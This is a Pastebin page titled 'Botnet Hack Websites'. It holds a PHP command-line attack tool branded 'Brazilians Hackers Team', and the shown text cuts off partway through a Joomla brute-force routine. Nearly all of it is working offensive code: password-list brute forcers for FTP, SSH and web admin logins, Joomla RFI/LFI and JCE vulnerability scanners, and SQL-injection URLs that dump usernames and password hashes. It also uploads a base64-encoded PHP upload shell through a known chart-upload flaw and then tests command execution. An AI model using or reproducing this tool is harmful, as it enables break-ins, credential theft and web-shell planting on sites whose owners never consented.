API tools faq
paste
imoujokerdz

Botnet Hack Websites

imoujokerdz
Jun 1st, 2017
260
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 61.09 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. $nan12="3";
  3. $saza="2$nan12";
  4.  
  5.  
  6. error_reporting(0);
  7. $pre1="1";
  8. $pr3="5";
  9. $namzak="4";
  10. $liliokjk ="$pre1$saza$namzak$pr3";
  11. set_time_limit(0);
  12.  
  13. $uploadfile="upload.php";
  14. $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
  15. $fbr=@fopen("upload.php","a+");
  16. @fwrite($fbr,$uploader);
  17. @fclose($fbr);
  18. ////first
  19. $lpa="$liliokjk == $clientpass ";
  20. echo"
  21. +#############################+
  22. # #
  23. # *** Brazilians Hackers Team #
  24. # #
  25. +#############################+
  26. [*]Entre Com A Senha Para Iniciar[*]: ";$clientpass=trim(fgets(STDIN,1024));
  27.  
  28.  
  29.  
  30.  
  31. if($liliokjk == $clientpass){
  32. echo"
  33. ##
  34. / \
  35. / \
  36. / \
  37. / \
  38. / \
  39. /____________\
  40. | |
  41. |, .-. .-. ,|
  42. | )(_o/ \o_)( |
  43. |/ /\ \|
  44. (_ ^^ _)
  45. | |
  46. ==|==========|==>
  47. `----------`
  48. ||==========================================||
  49. || *** Brazilians Hackers Team *** ||
  50. || ||
  51. || *** Brazilians Hackers Team *** ||
  52. ||------------------------------------------||
  53. || ||
  54. || *** Brazilians Hackers Team *** ||
  55. || ||
  56. || ||
  57. ||==========================================||
  58.  
  59.  
  60. [1] JOOMLA SCANNER:
  61. [2] WORDPRESS SCANNER:
  62. [3] GERAL SCAN:
  63. [4] ADMIN FINDER:
  64. [5] TIPOS DE SCRIPT:
  65. [6] BRUTE FORCE:
  66. [7] SAIR DO PROGRAMA
  67. \n\n
  68. ";
  69. echo " Escolha Uma Opcao E Aperte Enter:\n
  70. ===>";
  71. $id =trim(fgets(STDIN,1024));
  72. if(!$id){
  73. $sec=true;
  74. while($sec){
  75. echo"Entre Com Alguma Opcao\n\n";
  76.  
  77. echo "ID Selecionada ===>";
  78. $id =trim(fgets(STDIN,1024));
  79. if($id){
  80. $sec=false;
  81. }
  82. }
  83. }
  84.  
  85. if($id == 7){
  86. echo"
  87. Skype: BrazilObscure
  88. Facebook: ChmoD.Haxor.5
  89. Email: BrazilObscure@live.com
  90.  
  91. ";
  92.  
  93. }
  94. if($id == 6){
  95.  
  96. echo"
  97. | |__ _ __ _ _| |_ ___
  98. | '_ \| '__| | | | __/ _ \
  99. | |_) | | | |_| | || __/
  100. |_.__/|_| \__,_|\__\___|
  101.  
  102. ================================
  103. || Brute Force Arabe Portal ||
  104. || ||
  105. || by ./ChmoD ||
  106. ================================
  107. [1] BRUTE FORCE FTP
  108. [2] BRUTE FORCE SSH
  109. [3] BRUTE FORCE ARABE PORTAL
  110. [4] BRUTE FORCE 4IMAGES
  111. [5] BRUTE FORCE TRAIDENT
  112.  
  113. ";
  114. echo"\n Entre Com Uma ID ===>";
  115. $brutid=trim(fgets(STDIN,1024));
  116. ##############traidnt-br
  117. if($brutid == 5) {
  118. echo"Seu Site ============>";
  119. $trasite=trim(fgets(STDIN,1024));
  120. echo"Usuario ============>";
  121. $trauser = trim(fgets(STDIN,1024));
  122.  
  123. # Passwords
  124. $trauspass1 = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  125.  
  126. function brute($site,$trauser,$trauspass12)
  127. {
  128. $curl = curl_init();
  129. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  130. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  131. curl_setopt($curl,CURLOPT_URL, $site."/admin/login.php");
  132. curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$trauser}&password={$trauspass12}");
  133. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  134. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  135. $brute = curl_exec($curl);
  136. return $brute;
  137. }
  138. foreach($trauspass1 as $trauspass12)
  139. {
  140. $b0x = brute($site,$trauser,$trauspass12);
  141. if(preg_match('#<a href="(.*?)">Top</a>#', $b0x))
  142. {
  143. echo "[+] Cracked \n Username : {$trauser}\n Password : {$trauspass12}\n\n";
  144. break;
  145. }
  146. }
  147.  
  148. }
  149.  
  150.  
  151.  
  152. ////////////////////////4images
  153. if($brutid == 4){
  154. echo"
  155. **********************************
  156. || BRUTE FORCE 4IMAGES ||
  157. ***********************************
  158. ";
  159. echo"Seu Site ALvo ======>";
  160. $images4site =trim(fgets(STDIN,1024));
  161. echo"Usuario =======>";
  162. $images4username = trim(fgets(STDIN,1024));
  163. $images4pass = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  164.  
  165. # Function Token
  166. function token($images4site)
  167. {
  168. $curl = curl_init();
  169. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  170. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  171. curl_setopt($curl,CURLOPT_URL, $images4site);
  172. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  173. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  174. $start = curl_exec($curl);
  175. preg_match('/<input type="hidden" name="__csrf" value="(.*?)" /', $start, $token);
  176. return $token[1];
  177. }
  178. $hash = token($images4site);
  179.  
  180. # Function Brute
  181. function brute($images4site,$images4username,$images4password,$hash)
  182. {
  183. $curl = curl_init();
  184. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  185. curl_setopt($curl, CURLOPT_POST, 1);
  186. curl_setopt($curl, CURLOPT_URL, $images4site);
  187. curl_setopt($curl, CURLOPT_POSTFIELDS, "__csrf={$hash}&action=login&redirect=#&loginusername=$images4username&loginpassword=$images4password");
  188. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  189. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  190. $brute = curl_exec($curl);
  191. return $brute;
  192. }
  193. foreach($images4pass as $images4password)
  194. {
  195. $b0x = brute($images4site,$images4username,$images4password,$hash);
  196. if(preg_match('/<p><a href="#">(.*?)<\/a><\/p>/', $b0x))
  197. {
  198. echo "[+]Usuario Encontrado: {$images4username} \n [+]Password: {$images4password}";
  199. break;
  200. }
  201. }
  202.  
  203.  
  204.  
  205.  
  206.  
  207. }
  208.  
  209.  
  210.  
  211.  
  212.  
  213.  
  214. if($brutid == 3){
  215. echo"
  216. **********************
  217. BRUTE FORCE ARABE PORTAL*
  218. **********************
  219. ";
  220. echo"Site Alvo =========>";
  221. $sitear = trim(fgets(STDIN,1024));
  222. $arsite = "$sitear/admin/";
  223. echo"Nome Do Usuario\n =========>";
  224. $usernamear =trim(fgets(STDIN,1024));
  225. # Passwords
  226. $nonopasswordsasqs = array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  227.  
  228. function brute($arsite,$usernamear,$nonopasswordsasq)
  229. {
  230. $curl = curl_init();
  231. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  232. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  233. curl_setopt($curl,CURLOPT_URL, $arsite);
  234. curl_setopt($curl,CURLOPT_POSTFIELDS,"user_name={$usernamear}&user_pass={$nonopasswordsasq}");
  235. @curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.txt");
  236. @curl_setopt($curl,CURLOPT_COOKIEFILE,"cookie.txt");
  237. $brute = curl_exec($curl);
  238. if(eregi('<p align="center"><b><font size="4" color="#FFFFFF">', $brute))
  239. {
  240. echo "[+] Encontrado
  241. Username:{$usernamear};\n
  242. Password : {$nonopasswordsasq}";
  243. }
  244. return $brute;
  245. }
  246. foreach($nonopasswordsasqs as $nonopasswordsasq)
  247. {
  248. brute($arsite,$usernamear,$nonopasswordsasq);
  249. }
  250.  
  251.  
  252.  
  253. }
  254. //////////////////////////////////ssh brut
  255. if($brutid == 2){
  256. echo"
  257. *********************************
  258. ================================
  259. || ||
  260. || BRUTE FORCE SSH ||
  261. || ||
  262. =================================
  263. Entre Com O Ip Do Servidor
  264. ======>"; $serverssh=trim(fgets(STDIN,1024));
  265. echo"Nome Do Usuario\n ====>"; $usernamessh=trim(fgets(STDIN,1024));
  266. $passwordss=array('ssh','passwodssh','123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  267. "pass123",
  268. "password123",
  269. "demo",
  270. "demo123",
  271. "demopass",
  272. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  273. ,"123456123456"
  274. ,"admin2010"
  275. ,"admin2011"
  276. ,"P@ssW0rd"
  277. ,"!@#$%^"
  278. ,"!@#$%^&*("
  279. ,"(*&^%$#@!"
  280. ,"111111"
  281. ,"222222"
  282. ,"333333"
  283. ,"444444"
  284. ,"555555"
  285. ,"666666"
  286. ,"777777"
  287. ,"888888"
  288. ,"999999"
  289. ,"admin2012"
  290. ,"admin2013"
  291. ,"admin2014"
  292. ,"password2013"
  293. ,"password2014");
  294. foreach($passwordss as $passwordssh){
  295. $conectssh=ssh2_connect($serverssh,22);
  296. if($conectssh){
  297. $sshlogin =ssh2_auth_password($conectssh,$usernamessh,$passwordssh);
  298. if($sshlogin){
  299. echo"
  300. crAcked \n\n
  301. \n\n\n
  302. \n******************************************************\n
  303. \n*user:$usernamessh=====>passsword:$passwordssh\n\n\n *\n
  304. \n******************************************************\n
  305. ";
  306. }else{
  307. "";
  308. }
  309. }else{
  310. echo"Cant#connect";
  311. }
  312. }
  313. ////////////////////////////////////////////////////////////
  314.  
  315.  
  316.  
  317.  
  318. }
  319. if($brutid == 1){
  320. echo"
  321. **********************************
  322. * BRUTE FORCE FTP *
  323. **********************************
  324.  
  325. IP Do Servidor ==>";
  326. $ip= trim(fgets(STDIN,1024));
  327. echo"\n";
  328. echo"Usuario==>";
  329. $usernameftp =trim(fgets(STDIN,1024));
  330.  
  331. $passwordftp=array("gat0tKaca",'123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  332. "pass123",
  333. "password123",
  334. "demo",
  335. "demo123",
  336. "demopass",
  337. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  338. ,"123456123456"
  339. ,"admin2010"
  340. ,"admin2011"
  341. ,"P@ssW0rd"
  342. ,"!@#$%^"
  343. ,"!@#$%^&*("
  344. ,"(*&^%$#@!"
  345. ,"111111"
  346. ,"222222"
  347. ,"333333"
  348. ,"444444"
  349. ,"555555"
  350. ,"666666"
  351. ,"777777"
  352. ,"888888"
  353. ,"999999"
  354. ,"admin2012"
  355. ,"admin2013"
  356. ,"admin2014"
  357. ,"password2013"
  358. ,"password2014");
  359. foreach($passwordftp as $passftp){
  360. $timeoutftp="40";
  361. $ftpport="21";
  362. $conent=ftp_connect($ip,$ftpport,$timeoutftp);
  363. if($conent){
  364. $lohin=ftp_login($conent,$usernameftp,$passftp);
  365. if($lohin){
  366. echo "Encontrado \n\n
  367. \n\n\n
  368. \n******************************************************\n
  369. \n*user:$usernameftp===>password:$passftp\n\n
  370. \n****************************************************\n";
  371. }else{
  372. echo "";
  373. }
  374.  
  375.  
  376. }else{
  377. echo"CanT connect ";
  378.  
  379. }
  380. }
  381.  
  382.  
  383. }
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394. }
  395. if($id == 1){
  396. echo"
  397. ||=============================================||
  398. || ,--^----------,--------,-----,-------^--, ||
  399. || | ||||||||| `--------' | O ||
  400. || `+---------------------------^----------| ||
  401. || `\_,-------, _________________________| ||
  402. || / XXXXXX /`| / ||
  403. || / XXXXXX / `\ / ||
  404. || / XXXXXX /\______( ||
  405. || / XXXXXX / ||
  406. || / XXXXXX / ||
  407. ||(________( ||
  408. || `------' ||
  409. ||=============================================||
  410. JOOMLA Selecione Alguma ID:
  411. [1]SCANNER UPLOAD SHELL:
  412. [2]SCANNER SQL INJECTION :
  413. [3]SCANNER JCE :
  414. [4]BRUTE FORCE :
  415. [5]SCANNER LFI/RFI:
  416. [6]COMPOSENT FINAL:\n
  417. ";
  418. echo"ID Selecionada ==>";
  419. $joomlaid=trim(fgets(STDIN,1024));
  420.  
  421. }
  422. if($joomlaid == 6){
  423.  
  424. echo"
  425. +#############################+
  426. # #
  427. # COMPOSENT JOOMLA #
  428. # #
  429. +#############################+
  430.  
  431. Site Alvo
  432. =====>";$urlcom=trim(fgets(STDIN,1024));
  433.  
  434. $source = @file_get_contents($urlcom);
  435. preg_match_all('{option,(.*?)/}i',$source,$f);
  436. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  437. preg_match_all('{/component/(.*?)/?view=reset}i',$source,$f3);
  438. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  439. $arz=array_merge($f2[1],$f[1],$f3[1]);
  440. $coms=array();
  441. foreach(array_unique($arz) as $x){
  442. $coms[]=$x;}
  443. foreach($coms as $comm){
  444. echo "
  445. ************************\n
  446. COMPOSENT : $comm\n
  447. ************************\n
  448. ";
  449.  
  450.  
  451. }
  452.  
  453.  
  454.  
  455.  
  456. }
  457. if($joomlaid == 5){
  458. echo"
  459. *********************************
  460. *** Scanner Joomla RFI/LFI ***
  461. *********************************\n\n
  462. Site Alvo http://\n
  463. Seu Site ======> "; $rfijm =trim(fgets(STDIN,1024));
  464. $rfijoomlap=array("/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=#rfi",
  465. "/components/com_simpleboard/file_upload.php?sbp=#rfi",
  466. "/components/com_hashcash/server.php?mosConfig_absolute_path=#rfi",
  467. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=#rfi",
  468. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=#rfi",
  469. "/components/com_performs/performs.php?mosConfig_absolute_path=#rfi",
  470. "/components/com_forum/download.php?phpbb_root_path=#rfi",
  471. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=#rfi",
  472. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=#rfi",
  473. "/components/minibb/index.php?absolute_path=#rfi",
  474. "/components/com_smf/smf.php?mosConfig_absolute_path=#rfi",
  475. "/modules/mod_calendar.php?absolute_path=#rfi",
  476. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=#rfi",
  477. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=#rfi",
  478. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=#rfi",
  479. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=#rfi",
  480. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=#rfi",
  481. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=#rfi",
  482. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=#rfi",
  483. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=#rfi",
  484. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=#rfi",
  485. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=#rfi",
  486. "/components/com_securityimages/lang.php?mosConfig_absolute_path=#rfi",
  487. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=#rfi",
  488. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=#rfi",
  489. "/akocomments.php?mosConfig_absolute_path=#rfi",
  490. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=#rfi",
  491. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=#rfi",
  492. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=#rfi",
  493. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=#rfi",
  494. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=#rfi",
  495. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=#rfi",
  496. "/components/com_fm/fm.install.php?lm_absolute_path=#rfi",
  497. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=#rfi",
  498. "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
  499. "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
  500. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=#rfi",
  501. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=#rfi",
  502. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=#rfi",
  503. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=#rfi",
  504. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=#rfi",
  505. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=#rfi",
  506. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=#rfi",
  507. "/components/com_mambowiki/MamboLogin.php?IP=#rfi",
  508. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=#rfi",
  509. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=#rfi",
  510. "/components/com_cpg/cpg.php?mosConfig_absolute_path=#rfi",
  511. "/components/com_moodle/moodle.php?mosConfig_absolute_path=#rfi",
  512. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=#rfi",
  513. "/components/com_mospray/scripts/admin.php?basedir=#rfi",
  514. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=#rfi",
  515. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=#rfi",
  516. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=#rfi",
  517. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=#rfi",
  518. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=#rfi",
  519. "/components/com_madeira/img.php?url=#rfi",
  520. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=#rfi",
  521. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi",
  522. "/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi");
  523. foreach($rfijoomlap as $rfisec){
  524. $yesrfi="$rfijm/$rfisec";
  525. $anis=get_headers($yesrfi);
  526. $lirif=preg_match("/404/",$anis[0]);
  527. if(!$lirif){
  528. echo"
  529. ===============================\n
  530. | Encontrado !!!!!\n |
  531. ===============================\n
  532. $yesrfi\n
  533. ";
  534. }
  535.  
  536. }
  537.  
  538. }
  539.  
  540.  
  541. if($joomlaid == 1){
  542. echo " RCE & RCI WEB \n http:// ==>";
  543. $rce =trim(fgets(STDIN,1024));
  544.  
  545.  
  546.  
  547.  
  548. $site = $rce;
  549. $filename = "upload.php";
  550. $path = array('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
  551. $name = array("/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/","/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/","/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/","/administrator/components/com_jinc/classes/graphics/tmp-upload-images/","/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/","/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/");
  552. $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
  553. $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
  554. $context = stream_context_create($options);
  555. foreach($rce as $sites)
  556. {
  557. foreach($path as $upload)
  558. {
  559. $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
  560. }
  561. foreach($name as $names)
  562. {
  563. $url = "{$sites}{$names}{$filename}";
  564. $check = @file_get_contents($url);
  565. if(eregi("brazilobscure@live.com", $check))
  566. {
  567. echo " {$sites}/{$names}/{$filename} \n />";
  568. flush();
  569. }else{
  570. echo "\n Nao Exploitado\n";
  571. }
  572. }
  573. }
  574.  
  575. $headers = array("Content-Type: application/octet-stream");
  576. $uploadfile="upload.php";
  577. $sec4ever =curl_init("$rce/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=upload.php");
  578. curl_setopt($sec4ever, CURLOPT_POST, true);
  579. curl_setopt($sec4ever, CURLOPT_POSTFIELDS, @$uploadfile);
  580. curl_setopt($sec4ever, CURLOPT_RETURNTRANSFER, 1);
  581. curl_setopt($sec4ever, CURLOPT_HTTPHEADER, $headers);
  582. $postResult = curl_exec($sec4ever);
  583. curl_close($sec4ever);
  584. $uaya="$rce/administrator/components/com_maian15/charts/tmp-upload-images/upload.php?cmd=id";
  585. $na=file_get_contents($uaya);
  586. if($na){
  587. echo"Exploitado\n $uaya";
  588. }
  589. }
  590.  
  591.  
  592. if($joomlaid == 2)
  593. {
  594. echo "Site Alvo http://\n===>";
  595. $jsql=trim(fgets(STDIN,1024));
  596.  
  597. $com_rsfiles="$jsql//index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(0x47726f75705833,username,0x7c3a7c,password,0x47726f75705833)+from+jos_users--";
  598. $get_com=@file_get_contents($com_rsfiles);
  599. if($get_com) {
  600.  
  601. preg_match("#Brazilians Hackers Team#",$get_com,$com_ress);
  602. $all = explode('|:|',$com_ress[1]);
  603. $username = $all[0];
  604. $password = $all[1];
  605. echo "
  606. DOne
  607. username:$username\n
  608. password:$password \n
  609.  
  610. ";
  611. }
  612.  
  613. $Alameda ="$jsql/index.php?option=com_alameda&amp;controller=comments&amp;task=edit&amp;storeid=1";
  614. $na =@file_get_contents($alameda);
  615. if($na)
  616. {
  617. echo"\n \n $jsql/index.php?option=com_alameda&amp;controller=comments&amp;task=edit&amp;storeid=-1+union+all+select+concat_ws(username,0x3a,password)+from+jos_users--";
  618. }
  619.  
  620.  
  621. $rokdownloads="$jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=1";
  622. $nananna=@file_get_contents($rokdownloads);
  623. if($nananna){
  624.  
  625. echo"\n $jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  626. }
  627. //////////com_timereturns ""
  628. $timereturns ="$jsql/index.php?option=com_timereturns&view=timereturns&id=7";
  629. $jais=file_get_contents($timereturns);
  630. if($jais){
  631. echo"\n $jsql/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--";
  632. }
  633. ////com_ezrealty
  634. $sa ="$jsql/index.php?option=com_ezrealty&amp;task=viewcategory&amp;id=1";
  635. $iua= file_get_contents($sa);
  636. if($iua){
  637. echo"$sa";
  638. }
  639. //////com_jobprofile
  640. $saaaa ="$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1";
  641. $ra895=file_get_contents($saaaa);
  642. if($ra895){
  643. echo"$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
  644. }else{echo"\n not found";}
  645. /////////////////////////////
  646.  
  647. }
  648.  
  649. ///////////////////////jce scaner
  650. if($joomlaid == 3 ){
  651. echo "Site Alvo http://\n";
  652. echo"Seu Site\n =====>";
  653. $jcesite =trim(fgets(STDIN,1024));
  654. echo"\n";
  655.  
  656. echo"\n";
  657. $jcepath = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743';
  658. $alljce ="$jcesite$jcepath";
  659. $jceget = @file_get_contents($alljce);
  660. $jcechek=eregi('{"result":null,"error":"No function call specified!"}',$jceget);
  661. if($jcechek){
  662. echo "\n Vulneravel JCE";
  663. }
  664. else {
  665. echo "\n Nao Vulneravel";
  666.  
  667. }
  668.  
  669. }
  670.  
  671. if($joomlaid == 4){
  672. echo "Brute Force Joomla\n";
  673. echo"Seu Site\n =====>";
  674. $rujm =trim(fgets(STDIN,1024));
  675. echo"\n";
  676. echo"username ===>";
  677. $usjm =trim(fgets(STDIN,1024));
  678. echo"\n";
  679.  
  680. $sitejmi ="$rujm/administrator/index.php";
  681. $passwords =array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  682. "pass123",
  683. "password123",
  684. "demo",
  685. "demo123",
  686. "demopass",
  687. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  688. ,"123456123456"
  689. ,"admin2010"
  690. ,"admin2011"
  691. ,"P@ssW0rd"
  692. ,"!@#$%^"
  693. ,"!@#$%^&*("
  694. ,"(*&^%$#@!"
  695. ,"111111"
  696. ,"222222"
  697. ,"333333"
  698. ,"444444"
  699. ,"555555"
  700. ,"666666"
  701. ,"777777"
  702. ,"888888"
  703. ,"999999"
  704. ,"admin2012"
  705. ,"admin2013"
  706. ,"admin2014"
  707. ,"password2013"
  708. ,"password2014");
  709.  
  710.  
  711. function token($sitejmi)
  712. {
  713. $curl = curl_init();
  714. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  715. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  716. curl_setopt($curl,CURLOPT_URL,$sitejmi);
  717. @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
